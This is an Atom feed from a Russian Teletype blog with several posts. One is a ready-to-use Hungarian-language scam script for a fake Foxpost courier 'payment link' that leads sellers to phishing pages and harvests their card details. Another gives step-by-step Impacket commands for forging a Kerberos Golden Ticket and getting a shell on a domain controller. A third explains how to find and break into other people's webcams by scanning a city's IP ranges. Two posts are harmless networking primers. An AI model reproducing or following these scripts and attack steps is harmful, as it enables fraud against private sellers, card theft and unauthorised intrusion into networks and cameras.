<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Даниил Тенигин</title><subtitle>auuuuuuuughhhhh</subtitle><author><name>Даниил Тенигин</name></author><id>https://teletype.in/atom/rytnux</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/rytnux?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/rytnux?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-08T07:29:45.694Z</updated><entry><id>rytnux:YGGYIPTrJUA</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/YGGYIPTrJUA?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Венгрия шаблоны</title><published>2023-08-23T21:36:41.547Z</published><updated>2023-08-23T21:36:41.547Z</updated><summary type="html">Hello, érdekel a termék. Tudna küldeni nekem több képet?</summary><content type="html">
  &lt;h2 id=&quot;YI1N&quot;&gt;ОБЩЕНИЕ С МАМОНТОМ&lt;/h2&gt;
  &lt;p id=&quot;OlxX&quot;&gt;Hello, érdekel a termék. Tudna küldeni nekem több képet?&lt;/p&gt;
  &lt;p id=&quot;Qaj3&quot;&gt;&lt;code&gt;Здравствуйте, меня интересует товар. Не могли бы вы прислать мне больше фотографий?&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;UqN1&quot;&gt;Oké, készen állok a vásárlásra.&lt;/p&gt;
  &lt;p id=&quot;Jcqp&quot;&gt;&lt;code&gt;Хорошо, я готов купить&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;66mD&quot;&gt;A szállítást a Foxpost weboldalán tudom intézni. Mondja, ha elintézem és kifizetem az árut és a kiszállítást, kényelmes lenne, ha átadná az árut a futárnak? El fog jönni az otthonodba. A pénzt azonnal megkapja a bankszámlájára&lt;/p&gt;
  &lt;p id=&quot;9vcz&quot;&gt;&lt;code&gt;Я могу оформить доставку на сайте Foxpost. Скажите, если я оформлю и оплачу товар и доставку, удобно ли Вам будет передать товар курьеру? Товар будет доставлен к вам домой. Вы получите деньги сразу же на свой банковский счет&lt;/code&gt;&lt;/p&gt;
  &lt;h3 id=&quot;3QCx&quot;&gt;Не знает как работает:&lt;/h3&gt;
  &lt;p id=&quot;nhOu&quot;&gt;A Foxpost rendelkezik egy olyan funkcióval, amellyel a vevő a weboldalon keresztül fizethet a megrendelésért. A fizetés után kapok egy speciális linket, amelyet elküldök Önnek. Ezen a linken keresztül gyűjtheti be a pénzt az árukért. Ha nem vagy elfoglalt, akkor most is leadhatom a rendelést&lt;/p&gt;
  &lt;p id=&quot;iLm9&quot;&gt;+ СКРИН&lt;/p&gt;
  &lt;p id=&quot;W2xE&quot;&gt;&lt;code&gt;В Foxpost есть функция, позволяющая покупателю оплатить заказ через сайт. После оплаты я получу специальную ссылку, которую отправлю вам. Собрать деньги за товар можно по этой ссылке. Если вы не заняты, могу сделать заказ прямо сейчас.&lt;/code&gt;&lt;/p&gt;
  &lt;h3 id=&quot;Cv7h&quot;&gt;Сразу согласен:&lt;/h3&gt;
  &lt;p id=&quot;oQi8&quot;&gt;Nagyszerű! Ha most nem vagy elfoglalt, akkor most elintézem a szállítást és kifizetem az árut. A weboldalon kapok egy speciális linket, amelyet elküldök neked. Ebben a linkben lesz utasítás arra vonatkozóan, hogyan lehet hozzájutni a pénzhez. Mindent egybevetve, majd meglátod magad&lt;/p&gt;
  &lt;p id=&quot;FVix&quot;&gt;&lt;code&gt;Замечательно! Если вы сейчас не заняты, я организую доставку и оплачу товар сейчас. На сайте я получу специальную ссылку, которую пришлю вам. По этой ссылке будут инструкции о том, как получить доступ к деньгам. В общем, вы сами увидите&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;KOxz&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;h6J2&quot;&gt;Через 5-10 минут, если согл&lt;/h3&gt;
  &lt;p id=&quot;cGA6&quot;&gt;Fizettem a szállításért és az áruért. A linkre kell kattintania, és megkapja a pénzt&lt;br /&gt;&lt;code&gt;Я оплатил доставку и товар. Вам нужно перейти по ссылке и получить деньги.&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;TH7E&quot;&gt;&lt;strong&gt;Теперь сразу:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;ds4r&quot;&gt;A #(номер) rendelés sikeresen kifizetésre került a Foxpost! &lt;br /&gt;Kérjük, továbbítsa a linket az eladónak. A biztonság kedvéért ne ossza meg a linket senki mással! &lt;br /&gt;Link: &lt;br /&gt;Köszönjük, hogy minket választott!&lt;br /&gt;Foxpost ©2023.&lt;/p&gt;
  &lt;p id=&quot;OqWJ&quot;&gt;&lt;code&gt;Заказ №(номер) успешно оплачен Foxpost!&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;mOcD&quot;&gt;&lt;code&gt;Пожалуйста, отправьте ссылку продавцу. В целях безопасности не делитесь ссылкой ни с кем!&lt;br /&gt;Ссылка:&lt;br /&gt;Спасибо, что выбрали нас!&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;gtT9&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;Xpyz&quot;&gt;ШАБЛОН ПОД ТП&lt;/h2&gt;
  &lt;h3 id=&quot;ptJI&quot;&gt;Открыл ссылку:&lt;/h3&gt;
  &lt;p id=&quot;NCh2&quot;&gt;Helló! Miben segíthetek?&lt;/p&gt;
  &lt;p id=&quot;ppmm&quot;&gt;&lt;code&gt;Привет! Чем могу помочь?&lt;/code&gt;&lt;/p&gt;
  &lt;h3 id=&quot;O8MK&quot;&gt;Ввод ЛК:&lt;/h3&gt;
  &lt;p id=&quot;PG1F&quot;&gt;Pénz fogadásához meg kell adnia kártyáját. Csak töltse ki az összes szükséges információt.&lt;/p&gt;
  &lt;p id=&quot;a8zP&quot;&gt;&lt;code&gt;Для получения денег необходимо ввести данные своей карты. Просто заполните всю необходимую информацию.&lt;/code&gt;&lt;/p&gt;
  &lt;h3 id=&quot;p6Wg&quot;&gt;Неверные данные:&lt;/h3&gt;
  &lt;p id=&quot;e4nM&quot;&gt;Ön helytelenül adta meg a bankszámlaadatait. Kérjük, ellenőrizze, hogy helyesen adta-e meg az adatokat, és próbálja meg újra.&lt;/p&gt;
  &lt;p id=&quot;6fYv&quot;&gt;&lt;code&gt;Вы неправильно ввели данные своего банковского счета. Пожалуйста, проверьте правильность ввода информации и повторите попытку.&lt;/code&gt;&lt;/p&gt;
  &lt;h3 id=&quot;REmA&quot;&gt;Сомневаеться:&lt;/h3&gt;
  &lt;p id=&quot;ZfgP&quot;&gt;Megbízhat bennünk, mert mar sok éve működünk. Ez idő alattbb mint 100.000 szállítási tranzakciót bonyolítottunk le, és soha nem kaptunk negatív visszajelzést. Szolgalatunk együtt a rendőrseggel. Ha csalási kísérlet történik, azonnal továbbítjuk az adatokat a rendőrségnek. Nagyra értékeljük hírnevünket, és ügyfeleink biztonságát helyezzük előtérbe! Garantaljuk a 100% ban biztonságos tranzakciót. Mindössze annyit kell tennie, fill in the card details, hogy jutalék nélkül kapja meg a pénzt. Semilyen körülmenyek között nem adjuk át adatait harmadik félnek!&lt;/p&gt;
  &lt;p id=&quot;yikT&quot;&gt;&lt;code&gt;Нам можно доверять, ведь мы работаем уже много лет. За это время мы совершили более 100 000 операций по доставке и ни разу не получили отрицательных отзывов. Наша служба работает вместе с полицией. Если происходит попытка мошенничества, мы немедленно передаем данные в полицию. Мы дорожим своей репутацией и ставим безопасность наших клиентов на первое место! Мы гарантируем 100% безопасную транзакцию. Все, что вам нужно сделать, это заполнить данные карты, чтобы получить деньги без комиссии. Ни при каких обстоятельствах мы не передадим ваши данные третьим лицам!&lt;/code&gt;&lt;/p&gt;

</content></entry><entry><id>rytnux:subnet_termuxqew</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/subnet_termuxqew?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Груповые адреса, подсеть</title><published>2023-07-31T12:56:31.021Z</published><updated>2023-07-31T12:56:31.021Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/2a/93/2a9343dd-a045-43a2-87f9-e991facfe4b3.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/1b/2b/1b2b34ec-e85b-4259-916d-503b65f68dd1.png&quot;&gt;Предыдущая статья - https://t.me/termuxqew/1220</summary><content type="html">
  &lt;figure id=&quot;VMHG&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1b/2b/1b2b34ec-e85b-4259-916d-503b65f68dd1.png&quot; width=&quot;1023&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;R5dT&quot;&gt;Предыдущая статья - &lt;a href=&quot;https://t.me/termuxqew/1220&quot; target=&quot;_blank&quot;&gt;https://t.me/termuxqew/1220&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;EDMT&quot;&gt;Нашли ошибку? Диз. инфа? Пишите сюда - &lt;a href=&quot;https://t.me/inspectiv&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Тык&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
  &lt;h2 id=&quot;LffX&quot;&gt;Груповые адреса&lt;/h2&gt;
  &lt;p id=&quot;x1Bg&quot;&gt;Если данные должны быть переданы на несколько устройств одновременно (например, просмотр видео с одной веб-камеры на различных компьютерах- или одновременное разворачивание образа операционной системы на несколько систем), то уменьшить нагрузку на сеть может использование групповых рассылок &lt;strong&gt;(IP Multicast Addressing).&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;29zq&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e0/04/e0045645-75c5-49ce-8267-420bdc042024.png&quot; width=&quot;928&quot; /&gt;
    &lt;figcaption&gt;вот такую схему смог вам сделать, простите что качество фигня&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NKTc&quot;&gt;Для этого компьютеру присваивается еще один IР-адрес из специального диапазона: с 224.0.0.0 по 239.255.255.2551 , причем диапазоны 224.0.0.0-224.0.0.255 и 239.0.0.0-239.255.255.255 Multicast-aдpec присваивается динамически, Это делает соответствующая программа, использующая многоадресную рассылку. Назначение адресов групповой рассылки производится соответствующим программным обеспечением.&lt;/p&gt;
  &lt;p id=&quot;BpFh&quot;&gt;&lt;code&gt;Про груповые адреса было взято с книги (&lt;a href=&quot;https://t.me/c/1518819519/51&quot; target=&quot;_blank&quot;&gt;https://t.me/c/1518819519/51&lt;/a&gt;)&lt;/code&gt;&lt;/p&gt;
  &lt;h2 id=&quot;2rd6&quot;&gt;Подсеть&lt;/h2&gt;
  &lt;figure id=&quot;99mX&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://www.cloud4y.ru/upload/medialibrary/e1f/5721fb18z8scn2dulxi6i6mzw94lunvs/maska1.png&quot; width=&quot;1068&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nyT7&quot;&gt;&lt;strong&gt;Подсеть (Subnet)&lt;/strong&gt; - это часть IP-сети, полученная путем разбиения сетевого адреса на более мелкие сегменты, что включает в себя множество хостов с одинаковым префиксом.&lt;/p&gt;
  &lt;p id=&quot;FlvY&quot;&gt;&lt;strong&gt;Маска адреса&lt;/strong&gt; - это параметр, который сообщает программному обеспечению о том, сколько компьютеров объединено в ту или иную группу (подсеть)&lt;/p&gt;
  &lt;p id=&quot;wVpR&quot;&gt;На этой картинке&lt;strong&gt; ( тут представлено два сегмента справа и с лева)&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;wWEd&quot;&gt;&lt;code&gt;Префикс — 192.168.18, 192.168.5&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;WEjY&quot;&gt;&lt;code&gt;Номер устройства — _ _ _ тут&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;7Dnl&quot;&gt;&lt;code&gt;Маска подсети — 192.168.0.0/24&lt;/code&gt;&lt;/p&gt;
  &lt;h2 id=&quot;xPWH&quot;&gt;Заключение&lt;/h2&gt;
  &lt;p id=&quot;Atvj&quot;&gt;Если вам нужна больше информации, спросите у автора статьи или ищите в интернете.&lt;/p&gt;
  &lt;h2 id=&quot;cmFS&quot;&gt;&lt;a href=&quot;https://t.me/termuxqew&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;НАШ ТЕЛЕГРАМ КАНАЛ&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;

</content></entry><entry><id>rytnux:tcp_udp</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/tcp_udp?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Протоколы TCP и UDP. </title><published>2023-07-28T17:44:41.760Z</published><updated>2023-07-28T17:50:24.352Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/d0/27/d0277531-83a8-43bc-9225-3a3d64d658b7.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/47/56/475660a6-b3bd-4b04-bd06-c54c3687938b.jpeg&quot;&gt;Привет! Хочу возобновить канал и поделиться интересными и познавательными материалами с вами. Не буду скрывать, что долго сомневался, о том, что же будет интересно и полезно для вас. Однако я пришел к решению начать с написания статей для новичков, в которых всё будет объяснено максимально доступно.</summary><content type="html">
  &lt;figure id=&quot;Uj6S&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/47/56/475660a6-b3bd-4b04-bd06-c54c3687938b.jpeg&quot; width=&quot;947&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;p9o6&quot;&gt;Привет! Хочу возобновить канал и поделиться интересными и познавательными материалами с вами. Не буду скрывать, что долго сомневался, о том, что же будет интересно и полезно для вас. Однако я пришел к решению начать с написания статей для новичков, в которых всё будет объяснено максимально доступно.&lt;/p&gt;
  &lt;p id=&quot;Ikis&quot;&gt;Буду использовать информацию из множества ресурсов, чтобы обеспечить достоверность и качество материалов. Надеюсь, это заинтересует вас, и вы найдете здесь много полезного.&lt;/p&gt;
  &lt;p id=&quot;gndY&quot;&gt;Так что, не будем тянуть, начинаем! Буду рад вашей поддержке и отзывам. Спасибо, что остаетесь со мной!&lt;/p&gt;
  &lt;p id=&quot;P7sR&quot;&gt;Если нашли ошибку в статье, напишите @inspectiv!&lt;/p&gt;
  &lt;h2 id=&quot;ivaM&quot;&gt;Протокол TCP&lt;/h2&gt;
  &lt;p id=&quot;711u&quot;&gt;&lt;em&gt;TCP&lt;/em&gt; (Transmission Control Protocol) — один из основных &lt;em&gt;протоколов&lt;/em&gt; передачи данных интернета, созданый в &lt;strong&gt;1972&lt;/strong&gt; году. Основная концепция работы TCP - обеспечение надежной и устойчивой передачи данных между устройствами в сети, используя проверку целостности, установление соединения и автоматическое переотправление потерянных пакетов.&lt;/p&gt;
  &lt;p id=&quot;EaIF&quot;&gt;❗ Т.е: Передача предусматривает наличие подтверждений получения информации. Если передающая сторона не получит в установленные сроки необходимого подтверждения (SYN + ACK), то данные будут переданы повторно&lt;/p&gt;
  &lt;figure id=&quot;V1fZ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b0/af/b0afb9ef-2950-476d-a5b3-2135518e05d1.png&quot; width=&quot;597&quot; /&gt;
    &lt;figcaption&gt;Схема как работает TCP (three-way-handshake)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;VJRw&quot;&gt;
    &lt;li id=&quot;1exG&quot;&gt;&lt;strong&gt;SYN&lt;/strong&gt; — этот флаг используется для настройки соединения между хостами.&lt;/li&gt;
    &lt;li id=&quot;TgBi&quot;&gt;&lt;strong&gt;ACK&lt;/strong&gt; — указывает, что поле «Подтверждение» имеет значение. Если ACK очищен до 0, это означает, что пакет не содержит подтверждения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;6UjF&quot;&gt;Если объяснить все просто:&lt;/p&gt;
  &lt;ol id=&quot;QBIS&quot;&gt;
    &lt;li id=&quot;1iba&quot;&gt;Когда компьютер A хочет начать разговор с компьютером B (например, чтобы отправить данные), он сначала говорит &amp;quot;Привет, я хочу поговорить!&amp;quot; (как пожать руку для начала разговора). Он делает это, отправляя специальный сигнал, называемый &amp;quot;SYN&amp;quot;.&lt;/li&gt;
    &lt;li id=&quot;hqYu&quot;&gt;Когда компьютер B получает сигнал &amp;quot;SYN&amp;quot; от компьютера A, он отвечает &amp;quot;Да, я слышу тебя, давай поговорим!&amp;quot; (как взаимное пожатие рук). Компьютер B отправляет обратно сигнал &amp;quot;SYN-ACK&amp;quot; (это означает &amp;quot;Я слышу тебя и готов общаться&amp;quot;).&lt;/li&gt;
    &lt;li id=&quot;3JNj&quot;&gt;Когда компьютер A получает ответ &amp;quot;SYN-ACK&amp;quot; от компьютера B, он говорит &amp;quot;Отлично, давай начнем наш разговор!&amp;quot; (как ответное пожатие рук). Компьютер A отправляет сигнал &amp;quot;ACK&amp;quot; (подтверждение) обратно компьютеру B.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h2 id=&quot;9zHu&quot;&gt;Протокол UDP&lt;/h2&gt;
  &lt;p id=&quot;PCwh&quot;&gt;UDP (User Datagram Protocol) — также один из основных &lt;em&gt;протоколов&lt;/em&gt; передачи данных интернета, созданый в &lt;strong&gt;1980&lt;/strong&gt; году. &lt;strong&gt;Отличие&lt;/strong&gt;: ❗ Передача данных по протоколу ТСР предусматривает наличие подтверждений получения информации, а по UDP - НЕТ&lt;/p&gt;
  &lt;figure id=&quot;Bepn&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1b/a4/1ba4ee9b-6252-4e47-a19d-1cec3b9d0dea.png&quot; width=&quot;331&quot; /&gt;
  &lt;/figure&gt;
  &lt;ol id=&quot;rnMi&quot;&gt;
    &lt;li id=&quot;3Utf&quot;&gt;&lt;strong&gt;Без установления соединения:&lt;/strong&gt; UDP не требует предварительного установления соединения между отправителем и получателем перед отправкой данных, что делает его более быстрым и менее надежным по сравнению с TCP.&lt;/li&gt;
    &lt;li id=&quot;xI0X&quot;&gt;&lt;strong&gt;Отправка пакетов без ожидания ответа:&lt;/strong&gt; При отправке данных через UDP, отправитель просто отправляет пакеты в сеть, но не ждет ответа от получателя. Это делает UDP более быстрым, но оставляет возможность потери пакетов без оповещения отправителя.&lt;/li&gt;
    &lt;li id=&quot;YwDX&quot;&gt;&lt;strong&gt;Отсутствие гарантии доставки:&lt;/strong&gt; UDP не обеспечивает механизмы проверки целостности и повторной отправки пакетов, что означает, что пакеты могут быть потеряны или доставлены в неправильном порядке без каких-либо попыток их восстановления.&lt;/li&gt;
    &lt;li id=&quot;iiUd&quot;&gt;&lt;strong&gt;Применение в определенных сценариях:&lt;/strong&gt; UDP часто используется в сценариях, где небольшие задержки и быстрая передача данных важнее, чем точность доставки. Например, в потоковом видео, аудио-трансляциях, онлайн-играх и других приложениях, где актуальность данных превышает их абсолютную надежность.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h2 id=&quot;xPWH&quot;&gt;Заключение&lt;/h2&gt;
  &lt;p id=&quot;Atvj&quot;&gt;Если вам нужна больше информации, спросите у автора статьи или ищите в интернете. Для проверки вашего понимания, ответьте на вопрос в комментариях: &amp;quot;Как лучше сканировать порты: через TCP или UDP?&amp;quot; Аргументируйте свой ответ. Ответ будет представлен в следующей статье.&lt;/p&gt;
  &lt;h2 id=&quot;cmFS&quot;&gt;&lt;a href=&quot;https://t.me/termuxqew&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;НАШ ТЕЛЕГРАМ КАНАЛ&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;

</content></entry><entry><id>rytnux:XKtufpHLlWk</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/XKtufpHLlWk?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Рецепт создания Golden Ticket'a</title><published>2023-04-22T20:45:16.010Z</published><updated>2023-04-24T06:29:35.477Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/8c/f3/8cf3b0e5-ca2b-45ae-86aa-c85d3ea61005.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://i.pinimg.com/564x/13/6f/be/136fbef70d58b786ae57fdcfaffa1d4c.jpg&quot;&gt;sudo python3 lookupsid.py DOMAIN.local/user:passwd@DCIP</summary><content type="html">
  &lt;figure id=&quot;mMiT&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://i.pinimg.com/564x/13/6f/be/136fbef70d58b786ae57fdcfaffa1d4c.jpg&quot; width=&quot;564&quot; /&gt;
  &lt;/figure&gt;
  &lt;ol id=&quot;PeGF&quot;&gt;
    &lt;li id=&quot;aCGq&quot;&gt;Узнаем SID&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;qyNZ&quot;&gt;&lt;code&gt;sudo python3 lookupsid.py DOMAIN.local/user:passwd@DCIP&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;yQiv&quot;&gt;&lt;code&gt;sudo python3 lookupsid.py MARVEL.local/pparker:meesh2eeE@192.168.63.137&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;HujG&quot;&gt;&lt;code&gt;У меня S-1-5-21-2456532762-888422967-2018005161&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;U0L2&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/98/be/98be1003-7f1f-48a9-9434-d4d580eb6c79.png&quot; width=&quot;757&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8750&quot;&gt;Учетка может быть любая, с малыми правами или без нету разницы.&lt;/p&gt;
  &lt;p id=&quot;MDYD&quot;&gt; 2. Получим NTLM hash от krbtgt&lt;/p&gt;
  &lt;p id=&quot;iFTd&quot;&gt;Можете это сделать через mimikatz/DCSync/meterpreter&lt;/p&gt;
  &lt;p id=&quot;sUKW&quot;&gt;&lt;code&gt;Мой хэш: 126aa2cf8f1ae103b0d3c0b2b3b5b2db &lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;1Fuh&quot;&gt; 3. Генерируем тикет&lt;/p&gt;
  &lt;p id=&quot;OMAJ&quot;&gt;&lt;code&gt;python ticketer.py -nthash &amp;lt;krbtgt&amp;gt; -domain-sid &amp;lt;SID&amp;gt; -domain &amp;lt;DOMAIN.local&amp;gt; &amp;lt;ИМЯ_НОВОЙ_УЧЕТКИ&amp;gt; &lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;DDJ1&quot;&gt;&lt;code&gt;python ticketer.py -nthash 126aa2cf8f1ae103b0d3c0b2b3b5b2db -domain-sid S-1-5-21-2456532762-888422967-2018005161 -domain MARVEL.local lol &lt;/code&gt; &lt;/p&gt;
  &lt;p id=&quot;4aYo&quot;&gt;&lt;code&gt;export KRB5CCNAME=lol.ccache&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;WsbP&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ec/5f/ec5f2929-3b37-4167-bffb-589d04f260ae.png&quot; width=&quot;558&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;JraM&quot;&gt;4. Подключаемся &lt;/p&gt;
  &lt;p id=&quot;XOOI&quot;&gt;&lt;code&gt;python3 psexec.py -dc-ip &amp;lt;DCIP&amp;gt; -target-ip &amp;lt;ИП_ЖЕРТВЫ_ПК&amp;gt; -no-pass -k ДОМЕН/НОВАЯ_УЧЕТКА@ИМЯ_КОМПА&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;tO5D&quot;&gt;&lt;code&gt;python3 psexec.py -dc-ip 192.168.63.137 -target-ip 192.168.63.137 -no-pass -k MARVEL.local/lol@HYDRA-DC.MARVEL.local&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;oQrD&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e2/2c/e22ca1b8-e953-462d-a381-5eb8f5c799ad.png&quot; width=&quot;709&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;tgvR&quot;&gt;Более детальная статья об этом - &lt;a href=&quot;https://telegra.ph/Haker---Zakreplyaemsya-v-Active-Directory-Kak-sohranit-dostup-pri-atake-na-domen-07-26&quot; target=&quot;_blank&quot;&gt;https://telegra.ph/Haker---Zakreplyaemsya-v-Active-Directory-Kak-sohranit-dostup-pri-atake-na-domen-07-26&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>rytnux:LpIcCmOgfV8</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/LpIcCmOgfV8?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Взлом web камер на простых примерах.</title><published>2022-04-22T06:55:19.280Z</published><updated>2022-04-22T06:55:19.280Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/34/01/3401a7c4-1019-469b-bb80-210368581752.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/1f49ab219e1cd75a1da24.png&quot;&gt;ИСТОЧНИК =&gt; https://cryptoworld.su/vzlom-web-kamer-na-prostyx-primerax/</summary><content type="html">
  &lt;p id=&quot;3nOF&quot;&gt;ИСТОЧНИК =&amp;gt; &lt;a href=&quot;https://cryptoworld.su/vzlom-web-kamer-na-prostyx-primerax/&quot; target=&quot;_blank&quot;&gt;https://cryptoworld.su/vzlom-web-kamer-na-prostyx-primerax/&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;6tXx&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/1f49ab219e1cd75a1da24.png&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;Для-взлома-камер-нам-понадобятся-несколько-программ:&quot;&gt;Для взлома камер нам понадобятся несколько программ:&lt;/h3&gt;
  &lt;ul id=&quot;yc8F&quot;&gt;
    &lt;li id=&quot;fUfq&quot;&gt;&lt;em&gt;KPortScan 3.0 (Скачать -&amp;gt; &lt;a href=&quot;https://oxy.name/d/sUqf&quot; target=&quot;_blank&quot;&gt;https://oxy.name/d/sUqf&lt;/a&gt;)&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;DMYZ&quot;&gt;&lt;em&gt;Yoba Parser (Скачать -&amp;gt; &lt;a href=&quot;https://oxy.name/d/uUqf&quot; target=&quot;_blank&quot;&gt;https://oxy.name/d/uUqf&lt;/a&gt;)&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;YTOY&quot;&gt;&lt;em&gt;iVMS-4200 Client&lt;/em&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;TKIY&quot;&gt;Нам нужны IP диапазоны — для этого переходим на сайт 4it.me и выбираем IP диапазоны.&lt;/p&gt;
  &lt;p id=&quot;85O0&quot;&gt;Вписываем нужный город:&lt;/p&gt;
  &lt;figure id=&quot;a1NF&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/651af4af3c25a38867d5f.jpg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;oeA8&quot;&gt;Выделяем все IP адреса и идем в программу KPortScan.&lt;/p&gt;
  &lt;p id=&quot;FLQF&quot;&gt;Изменяем порт на 8000 и вставляем все IP адреса.&lt;/p&gt;
  &lt;p id=&quot;MwZ6&quot;&gt;Нажимаем на кнопку «Start»:&lt;/p&gt;
  &lt;figure id=&quot;KoAt&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/c17e7b4797a324d2e092d.jpg&quot; width=&quot;636&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;k671&quot;&gt;После завершения проверки, открываем из папки с программой текстовик «results.txt».&lt;/p&gt;
  &lt;p id=&quot;sIRN&quot;&gt;И копируем все IP адреса.&lt;/p&gt;
  &lt;p id=&quot;BGJK&quot;&gt;Открываем папку с программой Yoba Parser.&lt;/p&gt;
  &lt;p id=&quot;kaQP&quot;&gt;Из папки с программой открываем текстовик ip.txt — и вставляем сюда все наши IP.&lt;/p&gt;
  &lt;p id=&quot;vRDz&quot;&gt;Запускаем программу — Она без интерфейса, так что просто нужно подождать, пока она закроется:&lt;/p&gt;
  &lt;figure id=&quot;ubqP&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/182a879420dfca3f93343.jpg&quot; width=&quot;975&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;E85o&quot;&gt;После завершения программы открываем текстовый документ «out.txt» и видим наши результаты! Поздравляю!&lt;/p&gt;
  &lt;figure id=&quot;0VTy&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/2f60d21b08a218eb05cb3.jpg&quot; width=&quot;271&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QEgs&quot;&gt;IP адресс камеры — (1)&lt;/p&gt;
